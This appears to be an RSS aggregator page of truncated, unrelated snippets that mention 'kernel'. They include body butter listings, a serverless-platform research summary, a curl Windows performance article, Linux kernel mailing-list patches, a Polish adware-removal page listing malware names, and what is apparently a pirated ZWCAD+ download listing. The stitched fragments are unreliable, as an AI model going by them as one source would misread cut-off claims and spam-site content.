Welcome to Kaggle Data Notes! Enjoy these new, intriguing, and overlooked datasets and kernels. 1. 🤬 From Hate Speech to Russian Troll Tweets (link) 2. 🇰 Data Science Trends on Kaggle (link) 3. 👜Fashion AC-GAN with Keras (link) 4. 📈 (Bio)statistics in R: Part #2 (link) 5. 🛰 Segmenting Buildings in Satellite Images (link) 6. ⚽ World Cup 2018: The One That Nearly Came Home (link) 7. 🇯🇵 The Best "Izakaya" Restaurant in Kyoto (link) 8. 👹 Dataset: Russian Troll Tweets (link) 9. 📈 Dataset: Political Propaganda on Facebook ...
          Usunąć Search.searchmecenter.com z Windows 10 : Wyrzucić Search.searchmecenter.com      Cache   Translate Page   Web Page Cache   
wskazówek, które Usunąć Search.searchmecenter.com Więcej zakażenie związane z Search.searchmecenter.com AdwareINetSpeak.Iexplorr, Vapsup.bmh, TSAdBot, Adware.FindLyrics, Altnet, Adware.IpWins, Adware.Clickspring.B, TrustIn BarBrowser HijackerInboxAce, MyPageFinder, BarQuery.com, Start.gamesagogo.iplay.com, Oibruvv.com, Findtsee.com, Papergap.comRansomwareBitStak Ransomware, Onion Ransomware, Coin Locker, Linkup Ransomware, Enjey Crypter Ransomware, PoshCoder, Gerkaman@aol.com Ransomware, Coverton Ransomware, Paycrypt Ransomware, PaySafeGen Ransomware, amagnus@india.com Ransomware, EncryptoJJS Ransomware, Venis RansomwareTrojanTrojanProxy.Win32-Agent, Trojan Horse Dropper.Agent.tid, Win32/TrojanDownloader.Wauchos.I, Kernel32.exe, ...
          Cast Your Kernel Results      Cache   Translate Page   Web Page Cache   
none
          Lavender Vanilla Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade by GaGirlNaturals      Cache   Translate Page   Web Page Cache   

9.25 USD

Lavender Vanilla Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade

Compare to Bath and Body Works Lavender Vanilla fragrance.

Lavender Vanilla is a soft and powdery herbal lavender sweetened with vanilla and a hint of musk. It is relaxing and tranquil, but also unique and memorable.

Want a handmade body butter that is skin softening and moisturizing and also has many wonderful benefits for your skin? Then, you have found a body butter for you! My handmade goat milk based whipped body butter is a luxurious treat for your skin. Made with goat milk, vitamin C, shea and cocoa butters, coconut, apricot kernel, avocado, olive, grape seed, pomegranate seed, argan, rose hip seed, and vitamin E oils to nourish your skin and provide many skin loving benefits.

Goat milk contains alpha-hydroxy acids that help to exfoliate dry, dead skin cells, contains probiotics which helps protect the skin from ultra violet light, contains high amounts of protein, fat, iron, vitamin A, B6, B12, C, D, E, and many more. These vitamins and minerals help slow down aging, help the skin rebuild, add elasticity, and help retain skin moisture, is readily absorbed into the skin, and very moisturizing. Vitamin C helps build collagen, protects against ultra violet rays, and contains antioxidants. Rose hip seed oil contains retinoic acid, a natural form of vitamin A. Pomegranate Seed oil is powerfully antioxidant and anti-inflammatory; and it is known to significantly boost epidermal cellular regeneration. Avocado, apricot kernel, olive, grape seed and coconut oils are readily absorbed into the skin, and very moisturizing.

4 Oz. Jar

My handmade products are made to order fresh for you.

*Paraben, propylene glycol, gluten, and phthalate free.*

Ingredients: Distilled water, sunflower oil, soya oil, vegetable glycerin, potassium sorbate, meadow foam oil, jojoba oil, goat's milk, aloe vera, vitamin c, shea butter, cocoa butter, coconut oil, pomegranate seed oil, olive oil, apricot kernel oil, avocado oil, grape seed oil, argan oil, rose hip seed oil, vitamin E oil, stearic acid, cetyl alcohol, emulsifying wax, palmitic acid

** Please note that cosmetic products like soaps and lotions can begin to melt if left in high temperatures. Please note your tracking information and try to be available to receive your package promptly.**

My Credentials:

I have a Master Cosmetology License and a Certificate
In Natural Health and Healing.

[*Type*] - Name trademarks and copyrights are properties of their respective manufacturers and/or designers. These versions are NOT to be confused with the originals and GaGirlNaturals has no affiliation with the manufacturers/designers. This description is to give the customer an idea of scent character, not to mislead, confuse the customer or infringe on the manufacturers/designer's name and valuable trademark.


          Bright Crystal Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade by GaGirlNaturals      Cache   Translate Page   Web Page Cache   

9.25 USD

Bright Crystal Type Whipped Body Butter, Goat Milk, Shea and Cocoa Butter With Vitamin C, Handmade

Compare to Versace Bright Crystal fragrance.

Bright Crystal is a fresh sensual blend of chilled yuzu and pomegranate mixed with soothing blossoms of peony, magnolia and lotus flower and warmed with musk and amber .

Want a handmade body butter that is skin softening and moisturizing and also has many wonderful benefits for your skin? Then, you have found a body butter for you! My handmade goat milk based whipped body butter is a luxurious treat for your skin. Made with goat milk, vitamin C, shea and cocoa butters, coconut, apricot kernel, avocado, olive, grape seed, pomegranate seed, argan, rose hip seed, and vitamin E oils to nourish your skin and provide many skin loving benefits.

Goat milk contains alpha-hydroxy acids that help to exfoliate dry, dead skin cells, contains probiotics which helps protect the skin from ultra violet light, contains high amounts of protein, fat, iron, vitamin A, B6, B12, C, D, E, and many more. These vitamins and minerals help slow down aging, help the skin rebuild, add elasticity, and help retain skin moisture, is readily absorbed into the skin, and very moisturizing. Vitamin C helps build collagen, protects against ultra violet rays, and contains antioxidants. Rose hip seed oil contains retinoic acid, a natural form of vitamin A. Pomegranate Seed oil is powerfully antioxidant and anti-inflammatory; and it is known to significantly boost epidermal cellular regeneration. Avocado, apricot kernel, olive, grape seed and coconut oils are readily absorbed into the skin, and very moisturizing.

4 Oz. Jar

My handmade products are made to order fresh for you.

*Paraben, propylene glycol, gluten, and phthalate free.*

Ingredients: Distilled water, sunflower oil, soya oil, vegetable glycerin, potassium sorbate, meadow foam oil, jojoba oil, goat's milk, aloe vera, vitamin c, shea butter, cocoa butter, coconut oil, pomegranate seed oil, olive oil, apricot kernel oil, avocado oil, grape seed oil, argan oil, rose hip seed oil, vitamin E oil, stearic acid, cetyl alcohol, emulsifying wax, palmitic acid

** Please note that cosmetic products like soaps and lotions can begin to melt if left in high temperatures. Please note your tracking information and try to be available to receive your package promptly.**

My Credentials:

I have a Master Cosmetology License and a Certificate
In Natural Health and Healing.

[*Type*] - Name trademarks and copyrights are properties of their respective manufacturers and/or designers. These versions are NOT to be confused with the originals and GaGirlNaturals has no affiliation with the manufacturers/designers. This description is to give the customer an idea of scent character, not to mislead, confuse the customer or infringe on the manufacturers/designer's name and valuable trademark.


          Help setting up Apache2 Server      Cache   Translate Page   Web Page Cache   
This might be a little long, so I apologize. I'm running Debian Stretch with KDE Plasma 5, kernel 4.9.0-7-amd64 on a Lenovo thinkpad x61 2Ghz, 4 GB RAM. I'm trying to run RISC with RPCemu and also...
          Pick a serverless fight: A comparative research of AWS Lambda, Azure Functions ...      Cache   Translate Page   Web Page Cache   

The saturation point is nowhere to be seen in the serverless discussion with tons ofnews coming online every day andnumerous reports trying to take the pulse of one of the hottest topics out there.

This time, however, we are not going to discuss any of the above. This article is going to be a bit more…academic!

During the last USENIX Annual Technical Conference ’18 that took place in Boston, USA in mid-July, an amazingly interesting academic research was presented .

The paper “Peeking Behind the Curtains of Serverless Platforms” is a comparative research and analysis of the three big serverless providers AWS Lambda, Azure Functions and Google Cloud Functions. The authors (Liang Wang, Mengyuan Li, Yinqian Zhang, Thomas Ristenpart, Michael Swift) conducted the most in-depth (so far) study of resource management and performance isolation in these three providers.

SEE ALSO: The state of serverless computing: Current trends and future prospects

The study systematically examines a series of issues related to resource management including how quickly function instances can be launched, function instance placement strategies, and function instance reuse. What’s more, the authors examine the allocation of CPU, I/O and network bandwidth among functions and the ensuing performance implications, as well as a couple of exploitable resource accounting bugs .

Did I get your attention now?

In this article, we have an overview of the most interesting results presented in the original paper.

Let’s get started!

Methodology

First things first. Let’s have a quick introduction to the methodology of this study.

The authors conducted this research by integrating all the necessary functionalities and subroutines into a single function that they call a measurement function .

According to the definition found in the paper, this function performs two tasks:

Collect invocation timing and function instance runtime information Run specified subroutines (e.g., measuring local disk I/O throughput, network throughput) based on received messages

In order to have a clear overview of the specifications for each provider, the following table provides a comparison of function configuration and billing in the three services.


Pick a serverless fight: A comparative research of AWS Lambda, Azure Functions  ...

The authors examined how instances and VMs are scheduled in the three serverless platforms in terms of instance coldstart latency, lifetime, scalability, and idle recycling and the results are extremely interesting.

Scalability and instance placement

One of the most intriguing findings, in my opinion, is on the scalability and instance placement of each provider. There is a significant discrepancy among the three big services with AWS being the best regarding support for concurrent execution :

AWS:“3,328MB was the maximum aggregate memory that can be allocated across all function instances on any VM in AWS Lambda. AWS Lambda appears to treat instance placement as a bin-packing problem, and tries to place a new function instance on an existing active VM to maximize VM memory utilization rates.”

Azure:Despite the fact that Azure documentation states that it will automatically scale up to at most 200 instances for a single Nodejs-based function and at most one new function instance can be launched every 10 seconds, the tests of Nodejs-based functions performed by the authors showed that “at most 10 function instances running concurrently for a single function”, no matter how the interval between invocations were changed.

Google:Contrary to what Google claims on how HTTP-triggered functions will scale to the desired invocation rate quickly, the service failed to provide the desired scalability for the study. “In general, only about half of the expected number of instances, even for a low concurrency level (e.g., 10), could be launched at the same time, while the remainder of the requests were queued.”

Interesting fact: More than 89% of VMs tested achieved 100% memory utilization.

Coldstart and VM provisioning

Concerning coldstart (the process of launching a new function instance) and VM provisioning, AWS Lambda appears to be on the top of its game :

AWS:Two types of coldstart events were examined: “a function instance is launched (1) on a new VM that we have never seen before and (2) on an existing VM. Intuitively, case (1) should have significantly longer coldstart latency than (2) because case (1) may involve starting a new VM.” However, the study shows that “case (1) was only slightly longer than (2) in general. The median coldstart latency in case (1) was only 39 ms longer than (2) (across all settings). Plus, the smallest VM kernel uptime (from /proc/uptime) that was found was 132 seconds, indicating that the VM has been launched before the invocation.” Therefore, these results show that AWS has a pool of ready VMs! What’s more, concerning the extra delays in case (1), the authors argue that they are “more likely introduced by scheduling rather than launching a VM.”

Azure:According to the findings, it took much longer to launch a function instance in Azure, despite the fact that their instances are always assigned 1.5GB memory. The median coldstart latency was 3,640 ms in Azure.

Google:“The median coldstart latency in Google ranged from 110 ms to 493 ms. Google also allocates CPU proportionally to memory, but in Google memory size has a greater impact on coldstart latency than in AWS.”

SEE ALSO: What do developer trends in the cloud look like?

Additional to the tests described above, the research team “collected the coldstart latencies of 128 MB, python 2.7 (AWS) or Nodejs 6.* (Google and Azure) based functions every 10 seconds for over 168 hours (7 days), and calculated the median of the coldstart latencies collected in a given hour.” According to the results, “the coldstart latencies in AWS were relatively stable, as were those in Google (except for a few spikes). Azure had the highest network variation over time, ranging from about 1.5 seconds up to 16 seconds.” Take a look at the figure below:


Pick a serverless fight: A comparative research of AWS Lambda, Azure Functions  ...

Source: “Peeking Behind the Curtains of Serverless Platforms”, Figure 8, p. 139

Instance lifetime

The research team defines as instance lifetime “the longest time a function instance stays active.

Keeping in mind that users prefer the longer lifetimes, the results depict Azure winning this one since Azure functions provide significantly longer lifetimes than AWS and Google, as you can see in the figures below:


Pick a serverless fight: A comparative research of AWS Lambda, Azure Functions  ...

Source: “Peeking Behind the Curtains of Serverless Platforms”, Figure 9, p.140

Idle instance recycling

Instance maximum idle time is defined by the authors as “the longest time an instance can stay idle before getting shut down.” Specifically for each service provider, the results show:

AWS:An instance could usually stay inac
          much faster curl uploads on Windows with a single tiny commit      Cache   Translate Page   Web Page Cache   

These days, operating system kernels provide TCP/IP stacks that can do really fast network transfers. It's not even unusual for ordinary people to have gigabit connections at home and of course we want our applications to be able take advantage of them.

I don't think many readers here will be surprised when I say that fulfilling this desire turns out much easier said than done in the windows world.

Autotuning?

Since Windows 7 / 2008R2, Windows implements send buffer autotuning . Simply put, the faster transfer and longer RTT the connection has, the larger the buffer it uses (up to a max) so that more un-acked data can be outstanding and thus enable the system to saturate even really fast links.

Turns out this useful feature isn't enabled when applications use non-blocking sockets. The send buffer isn't increased at all then.

Internally, curl is using non-blocking sockets and most of the code is platform agnostic so it wouldn't be practical to switch that off for a particular system. The code is pretty much independent of the target that will run it, and now with this latest find we have also started to understand why it doesn't always perform as well on Windows as on other operating systems: the upload buffer (SO_SNDBUF) is fixed size and simply too small to perform well in a lot of cases

Applications can still enlarge the buffer, if they're aware of this bottleneck, and get better performance without having to change libcurl, but I doubt a lot of them do. And really, libcurl should perform as good as it possibly can just by itself without any necessary tuning by the application authors.

Users testing this out

Daniel Jelinski brought a fix for this that repeatedly poll Windows during uploads to ask for a suitable send buffer size and then resizes it on the go if it deems a new size is better. In order to figure out that if this patch is indeed a good idea or if there's a downside for some, we went wide and called out for users to help us .

The results were amazing. With speedups up to almost 7 times faster , exactly those newer Windows versions that supposedly have autotuning can obviously benefit substantially from this patch. The median test still performed more than twice as fast uploads with the patch. Pretty amazing really. And beyond weird that this crazy thing should be required to get ordinary sockets to perform properly on an updated operating system in 2018.

Windows XP isn't affected at all by this fix, and we've seen tests running as VirtualBox guests in NAT-mode also not gain anything, but we believe that'sVirtualBox's "fault" rather than Windows or the patch.

Landing

The commit is merged into curl's master git branch and will be part of the pending curl 7.61.1 release, which is due to ship on September 5, 2018 . I think it can serve as an interesting case study to see how long time it takes untilWindows 10 users get their versions updated to this.

Table of test runs

The Windows versions, and the test times for the runs with the unmodified curl, the patched one, how much time the second run needed as a percentage of the first, a column with comments and last a comment showing the speedup multiple for that test.

Thank you everyone who helped us out by running these tests!

Version Time vanilla Time patched New time Comment speedup 6.0.6002 15.234 2.234 14.66% Vista SP2 6.82 6.1.7601 8.175 2.106 25.76% Windows 7 SP1 Enterprise 3.88 6.1.7601 10.109 2.621 25.93% Windows 7 Professional SP1 3.86 6.1.7601 8.125 2.203 27.11% 2008 R2 SP1 3.69 6.1.7601 8.562 2.375 27.74% 3.61 6.1.7601 9.657 2.684 27.79% 3.60 6.1.7601 11.263 3.432 30.47% Windows 2008R2 3.28 6.1.7601 5.288 1.654 31.28% 3.20 10.0.16299.309 4.281 1.484 34.66% Windows 10, 1709 2.88 10.0.17134.165 4.469 1.64 36.70% 2.73 10.0.16299.547 4.844 1.797 37.10% 2.70 10.0.14393 4.281 1.594 37.23% Windows 10, 1607 2.69 10.0.17134.165 4.547 1.703 37.45% 2.67 10.0.17134.165 4.875 1.891 38.79% 2.58 10.0.15063 4.578 1.907 41.66% 2.40 6.3.9600 4.718 2.031 43.05% Windows 8 (original) 2.32 10.0.17134.191 3.735 1.625 43.51% 2.30 10.0.17713.1002 6.062 2.656 43.81% 2.28 6.3.9600 2.921 1.297 44.40% Windows 2012R2 2.25 10.0.17134.112 5.125 2.282 44.53% 2.25 10.0.17134.191 5.593 2.719 48.61% 2.06 10.0.17134.165 5.734 2.797 48.78% run 1 2.05 10.0.14393 3.422 1.844 53.89% 1.86 10.0.17134.165 4.156 2.469 59.41% had to use the HTTPS endpoint 1.68 6.1.7601 7.082 4.945 69.82% over proxy 1.43 10.0.17134.165 5.765 4.25 73.72% run 2 1.36 5.1.2600 10.671 10.157 95.18% Windows XP Professional SP3 1.05 10.0.16299.547 1.469 1.422 96.80% in a VM runing on linux 1.03 5.1.2600 11.297 11.046 97.78% XP 1.02 6.3.9600 5.312 5.219 98.25% 1.02 5.2.3790 5.031 5 99.38% Windows 2003 1.01 5.1.2600 7.703 7.656 99.39% XP SP3 1.01 10.0.17134.191 1.219 1.531 125.59% FTP 0.80 TOTAL 205.303 102.271 49.81% 2.01 MEDIAN 43.51% 2.30
          chromebookでlinuxを動かしていますが、キーボード、サウンドが反応しません      Cache   Translate Page   Web Page Cache   
chromebookでlinuxを動かしていますが、キーボード、サウンドが反応しません。 数日前にLinuxを始めたばかりで、ドライバ関係もよくわからず、解決の兆しがありません。 できるだけわかりやすくご教授いただけると幸いです。 System: Host: chrx Kernel: 4.9.4-galliumos-braswell x86_64 (64 bit gcc: 5.4.0) Desktop: Xfce 4.12.3 (Gtk 2.24.30) Distro:
          Cedar Rapids Pulls Away for 9-4 Win      Cache   Translate Page   Web Page Cache   
CLINTON, IOWA - A five-run, two-out rally in the fifth inning pushed the Cedar Rapids Kernels toward a 9-4 victory Thursday against the Clinton Lumber... - MWL Cedar Rapids Kernels
          LR-Link Launches New Mass-Market 10GigE NIC Based on Tehuti Networks’ Tech      Cache   Translate Page   Web Page Cache   

LR-Link, a maker of networking solutions from China, has announced its first 10 GbE NIC, the wordy-named LREC6860BT. The new NIC is the first such retail product we've seen based on a design from Tehuti Networks, an Israel-based developer, bringing some more welcome competition to the 10GigE NIC market. LR-Link will be aiming at the (relative) mass-market for standalone NICs with this card, with the card now selling in Japan as well as online for less than $100.

Under the hood, the LR-Link LREC6860BT NIC is based on Tehuti Networks’ TN4010 MAC, which is further paired with Marvell’s Alaska X 88X3310P 10 GbE transceiver. The card features a PCIe Gen 2 x4 interface as well as an RJ45 connector that supports 100M, 1G, 2.5G, 5G, and 10G speeds using Cat5e/Cat6/Cat6A cabling. The card fully supports contemporary operating systems from Apple, Microsoft, and VMware as well as various Linux distributives. Therefore, the NIC is drop-in compatible with most computers that are in use today.

LR-Link's 10 GbE NIC
  LREC6860BT
Silicon MAC Tehuti Networks TN4010 
Transceiver Marvell Alaska X 88X3310P
100BASE-T Yes
1000BASE-T Yes
2.5GBASE-T Yes
5GBASE-T Yes
10GBASE-T Yes (over Cat6A cables)
Ports 1
OS Compatibility Apple MacOS 10.10.3 or later
Microsoft Windows 7 / 8 / 8.1 / 10 or later

Windows Server 2008 R2 / 2012 / 2012 R2 / 2016 R2 or later
VMware Vmware ESX / ESXi 5.x / 6.x or later
Linux Linux Stable Kernel version 2.6.x/3.x or later
Price $83 - $91
Release Date Q3 2018
Additional Information Link

The LREC6860BT is currently available from at least one retailer in Japan for ¥10,164 ($91) with VAT, which is not very high considering the fact that PC components tend to cost more in Japan than in the rest of the world. Unfortunately products from LR-Link aren't readily available from retailers outside China and Japan, but the company’s devices (including the 10 GbE NIC) can still be purchased from official stores on AliExpress, Ebay, and JD.com.

10 GbE networks are not yet widespread in SOHO environments, primarily because there are not many reasonably-priced 10 GbE switches. Meanwhile, a number of companies have released their relatively affordable 10 GbE NICs based on chips from Aquantia over the past few quarters, anticipating demand for such cards from enthusiasts. Aquantia is not the only provider of solutions for inexpensive 10 GbE cards. Tehuti Networks is considerably less known because it is focused on working with enterprise OEMs rather than with AIBs and retail. Nonetheless, having a second player in the space for cheap 10GigE/NBASE-T silicon is an important part of driving down the cost of the technology  –and boosting adoption – even further.

Related Reading:

Source: PC Watch


          openfiler ESA 2.99.1版本遇到的问题      Cache   Translate Page   Web Page Cache   
大神帮忙看下如何解决:kernel panic - not syncing:fatal exception call trace [] panic+0xa5/0x198 小白不懂这是什么问题。
          Re: [PATCH v2 2/2] RISC-V: Don't use a global include guard for ua ...      Cache   Translate Page   Web Page Cache   
Guenter Roeck writes: (Summary) ]
ÿ¿¿¿¿¿ÿ¿¿¿¿¿ÿ¿¿¿¿¿ https://wiki.qemu.org/Documentation/Platforms/RISCV Here are my qemu command lines:
Here are my qemu command lines:
qemu-system-riscv64 -M virt -m 512M -no-reboot -bios bbl \ -kernel vmlinux -netdev user,id=net0 -device virtio-net-device,netdev=net0 \ -initrd rootfs.cpio \
-append 'rdinit=/sbin/init earlycon console=ttyS0,115200' \ -nographic -monitor none
-nographic -monitor none
qemu-system-riscv64 -M virt -m 512M -no-reboot -bios bbl \ -kernel vmlinux -netdev user,id=net0 -device virtio-net-device,netdev=net0 \ -device virtio-blk-device,drive=d0 \
-drive file=rootfs.ext2,if=none,id=d0,format=raw \
-append 'root=/dev/vda rw earlycon console=ttyS0,115200' \ -nographic -monitor none
-nographic -monitor none
Root file systems and the bbl binary are published at https://gi
          Re: [PATCH v1 3/4] drivers: edac: Add EDAC driver support for QCOM ...      Cache   Translate Page   Web Page Cache   
Borislav Petkov writes: (Summary) On Wed, Aug 01, 2018 at 01:33:34PM -0700, Venkata Narendra Kumar Gutta wrote: Add error reporting driver for SBEs and DBEs. Space between name and email address.
Space between name and email address.
+L: linux-arm-msm@vger.kernel.org
Also
Also
L: linux-edac@vger.kernel.org
L: linux-edac@vger.kernel.org
so that the EDAC ML gets CCed too.
so that the EDAC ML gets CCed too.
+ depends on EDAC=y
Why on EDAC=y? Or some other smarter scheme to save object size...
size...
+llcc_ecc_irq_handler (int irq, void *edev_ctl)
Stray " " after function name.
Stray " " after function name.
+ edev_ctl->pvt_info = (struct llcc_drv_data *) llcc_driv_data;
          [PATCH 03/16] staging: gasket: core: fix line continuation indent ...      Cache   Translate Page   Web Page Cache   
Todd Poynor writes: (Summary) From: Todd Poynor <toddpoynor@google.com>
From: Todd Poynor <toddpoynor@google.com>
Previous cleanups missed a case of multi-line function call with line continuation parameters not aligned per kernel style. 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/staging/gasket/gasket_core.c b/drivers/staging/gasket/gasket_core.c index 37d14e30ffa21..3fb805204d700 100644 --- a/drivers/staging/gasket/gasket_core.c +++ b/drivers/staging/gasket/gasket_core.c @@ -231,8 +231,9 @@ static int gasket_alloc_dev(struct gasket_internal_desc *internal_desc, dev_info->devt = MKDEV(driver_desc->major, driver_desc->minor + gasket_dev->dev_idx);
          Re: [PATCH] reiserfs: fix broken xattr handling (heap corruption, ...      Cache   Translate Page   Web Page Cache   
Jann Horn writes: (Summary) On Thu, Aug 2, 2018 at 5:16 PM Jann Horn <jannh@google.com> I have not received any replies to this patch, which fixes a kernel security bug, for a week.
Whose tree should this go through? reiserfs is marked as "supported", but does not have a maintainer or a git repo listed, just a mailinglist, so I guess it probably has to go through either Al Viro's or akpm's tree? Looks like akpm signed off on the last commits in reiserfs...
reiserfs...
2.18.0.597.ga71716f1ad-goog
2.18.0.597.ga71716f1ad-goog

          [PATCH] ia64:tioce_provider: Use kmemdup rather than implement the ...      Cache   Translate Page   Web Page Cache   
zhong jiang writes: (Summary) The kmemdup has implemented the function that kmalloc() + memcpy will do. 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/ia64/sn/pci/tioce_provider.c b/arch/ia64/sn/pci/tioce_provider.c index 3bd9abc..9ba61bc 100644 --- a/arch/ia64/sn/pci/tioce_provider.c +++ b/arch/ia64/sn/pci/tioce_provider.c @@ -1000,11 +1000,11 @@ * Allocate kernel bus soft and copy from prom. */ - tioce_common = kzalloc(sizeof(struct tioce_common), GFP_KERNEL); + tioce_common = kmemdup(prom_bussoft, sizeof(struct tioce_common), + GFP_KERNEL);
          [PATCH] sched/core: Fix compiling warring in smp=n case      Cache   Translate Page   Web Page Cache   
Dou Liyang writes: (Summary) When compiling kernel with SMP disabled, the build warns with: When compiling kernel with SMP disabled, the build warns with: kernel/sched/core.c: In function ‘update_rq_clock_task’: kernel/sched/core.c:139:17: warning: unused variable ‘irq_delta’ [-Wunused-variable] s64 steal = 0, irq_delta = 0;
s64 steal = 0, irq_delta = 0;
Fix this by revert the HAVE_SCHED_AVG_IRQ to
Fix this by revert the HAVE_SCHED_AVG_IRQ to
defined(CONFIG_IRQ_TIME_ACCOUNTING) ||
          [PATCH bpf-next v2 1/4] docs: net: Fix various minor typos      Cache   Translate Page   Web Page Cache   
"Tobin C. Harding" writes: (Summary) The JIT compiler is transparently invoked for each attached filter from user space or for internal kernel users if it has been previously enabled by root: @@ -572,7 +572,7 @@ Internally, for the kernel interpreter, a different instruction set format with similar underlying principles from BPF described in previous paragraphs is being used. While eBPF is an ISA, BPF extensions date back to classic BPF's 'overloading' @@ -647,12 +647,12 @@ Some core changes of the new internal format: 32-bit architectures run 64-bit internal BPF programs via interpreter.
          Re: [PATCH v3] resource: Merge resources on a node when hot-adding ...      Cache   Translate Page   Web Page Cache   
Andrew Morton writes: (Summary) On Thu, 9 Aug 2018 12:54:09 +1000 Rashmica Gupta <rashmica.g@gmail.com> wrote: On Thu, 9 Aug 2018 12:54:09 +1000 Rashmica Gupta <rashmica.g@gmail.com> wrote: merge contiguous resources on the node.
What is the end-user impact of this patch?
What is the end-user impact of this patch?
Do you believe the fix should be merged into 4.18? Backporting into -stable kernels? If so, why?
-stable kernels? If so, why?
Thanks.
Thanks.
Thanks.

          Re: [PATCH v2 2/2] RISC-V: Don't use a global include guard for ua ...      Cache   Translate Page   Web Page Cache   
Palmer Dabbelt writes: (Summary) They'll be necessary to make this all work, and there's a v4 out now that when combined with for-next should get you to userspace.
userspace.
https://lore.kernel.org/lkml/20180809075602.989-1-hch@lst.de/T/#u https://lore.kernel.org/lkml/20180809075602.989-1-hch@lst.de/T/#u Also, what is your methodology? I follow
https://wiki.qemu.org/Documentation/Platforms/RISCV https://wiki.qemu.org/Documentation/Platforms/RISCV and could could natively compile and run hello world with an earlier version of Christoph's patch set, which is really only cosmetically different than the v4.
          Re: [PATCH] checkpatch: DT bindings should be a separate patch      Cache   Translate Page   Web Page Cache   
Andrew Morton writes: On Thu, 9 Aug 2018 14:50:32 -0600 Rob Herring <robh@kernel.org> wrote: On Thu, 9 Aug 2018 14:50:32 -0600 Rob Herring <robh@kernel.org> wrote: + "DT binding docs and includes should be a separate patch\n"); A pointer to Documentation/devicetree/bindings/submitting-patches.txt might be helpful?
might be helpful?
}
}

          Re: [PATCH v4 0/4] seccomp trap to userspace      Cache   Translate Page   Web Page Cache   
Dinesh Subhraveti writes: (Summary) As such, I spoke about the approach, it's value for networking and a few possible ways of implementing it in the kernel at Linux Plumbers Conference 2017.
Conference 2017.
As a contractor and a member of our team at AppSwitch (FKA Fermat), Tycho Andersen helped implement a fully user space version of system call trap mechanism based on seccomp / fd-passing and participated in our team discussions about upstreaming a kernel version of the feature. Given that context, we were taken aback that he posted the v1 patch set without letting us know and without any mention of AppSwitch in the post even though he was still under contract at that time.
time.
In any case, please note that we will communicate with Tycho directly regarding this matter going forward.
regarding this matter going forward.
--
Dinesh Subhraveti
Dinesh Subhraveti
Dinesh Subhraveti

          Re: [RFC PATCH v2 1/4] dt-bindings: misc: Add bindings for misc. B ...      Cache   Translate Page   Web Page Cache   
Kun Yi writes: (Summary) After going through the thread I figured that I'd like to share a few things we needed to hack when programming several BMC boards: things we needed to hack when programming several BMC boards: - Debug UART enable/mux
- Disable GPIO D/E passthrough (I think this is supported by the current pinctrl driver)
- RMII/RGMII strapping
- iLPC2AHB control
- SPI master mux select
- Various SuperIO configurations
- Various SuperIO configurations
As for the discussion whether these belong to a platform driver or device tree nodes, I think in an ideal world all these configurations could be nicely grouped and abstracted in a platform kernel driver (or drivers). Sometimes we need initial values for these parameters set before running userspace, and setting such values in device tree is easier than using #defines or kernel parameters.
easier than using #defines or kernel parameters.
easier than using #defines or kernel parameters.
easier than using #defines or kernel parame
          Re: lspci: Display path to device      Cache   Translate Page   Web Page Cache   
Matthew Wilcox writes: Martin? Bjorn's looking to merge this soon and it'd be nice to have the support in lspci too.
the support in lspci too.
On Tue, Jul 17, 2018 at 01:39:00PM -0700, Matthew Wilcox wrote: More majordomo info at http://vger.kernel.org/majordomo-info.html More majordomo info at http://vger.kernel.org/majordomo-info.html
          Re: [PATCH v3 7/7] firmware: coreboot: Request table region for ex ...      Cache   Translate Page   Web Page Cache   
Julius Werner writes: (Summary) Because it seems that it only prevents accesses to areas marked as IORESOURCE_BUSY, and while I can't fully follow how the kernel assigns that, comments suggest that this is only set when "Driver has marked this resource busy".
busy".
So after you make the change to the other patch where we immediately unmap the coreboot table again at the end of the probe() function, shouldn't it become available to userspace again even with IO_STRICT_DEVMEM set?
On Thu, Aug 9, 2018 at 4:37 PM Julius Werner <jwerner@chromium.org>
          Re: [PATCH v3 7/7] firmware: coreboot: Request table region for ex ...      Cache   Translate Page   Web Page Cache   
Julius Werner writes: (Summary) But cbmem can also print some of the other CBMEM sections which it finds by querying the coreboot table, such as the firmware log or the boot timestamps.
firmware log or the boot timestamps.
So the question is how we can get to that content if /dev/mem isn't available anymore. but then we'd essentially want that to take absolute addresses because that's what the coreboot table pointers contain, so we would've just built /dev/mem by another name (for a restricted range).
/dev/mem by another name (for a restricted range).
The nicest thing, really, would be if there was a way for a kernel driver to mark specific regions as "allowed" by /dev/mem.
          [PATCH 2/2] staging: fbtft: Adds space around "/"      Cache   Translate Page   Web Page Cache   
Leonardo Brás writes: (Summary) Kernel coding style recommends a space char around "/". 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/staging/fbtft/fbtft.h b/drivers/staging/fbtft/fbtft.h index 798a8fe98e95..25302ffc4000 100644 --- a/drivers/staging/fbtft/fbtft.h +++ b/drivers/staging/fbtft/fbtft.h @@ -232,7 +232,7 @@ struct fbtft_par { bool polarity; -#define NUMARGS(...) (sizeof((int[]){__VA_ARGS__})/sizeof(int)) +#define NUMARGS(...) (sizeof((int[]){__VA_ARGS__}) / sizeof(int)) #define write_reg(par, ...) \ ((par)->fbtftops.write_register(par, NUMARGS(__VA_ARGS__), __VA_ARGS__)) -- 2.18.0

          ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 180810      Cache   Translate Page   Web Page Cache   

ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 180810
[center]
http://i69.fastpic.ru/big/2015/0609/b3/cd73b5b1ae8e22b20f6d6417767840b3.jpg

ZWCAD+ 2015 SP2.1 Pro 2015.05.26.27086 | 245.21 MB
A cost-effective light-weight CAD platform with .dwg compatibility for drafting, modeling, and drawing. The new memory optimization technology enables ZWCAD+ to open any drawing with memory usage reduced by 50%. That why it works smoothly with drawings that are even over 100 MB. It ensures non-stop operation throughout the day.
We innovate to fulfill your design desires

[/center]

[center]
Smart Mouse, Smart Peek and a different Ribbon Interface are tailor-made to give you a light weight, flexible and fast user experience.
Seamless compatibility with other CAD software
Having been through over 50,000 extremely rigorous drawing tests to guarantee seamless .dwg compatibility, ZWCAD+ makes cross-platform communication easier than ever before. Now ZWCAD+ can also support DWG 2013.
Code-level compatible APIs easily create better solutions
ZRX, ARX and .NET are now code-level compatible. Lisp routines can now run directly on ZWCAD+ with only a few modifications. The new APIs enable developers to port their applications to ZWCAD+ 10 times faster.
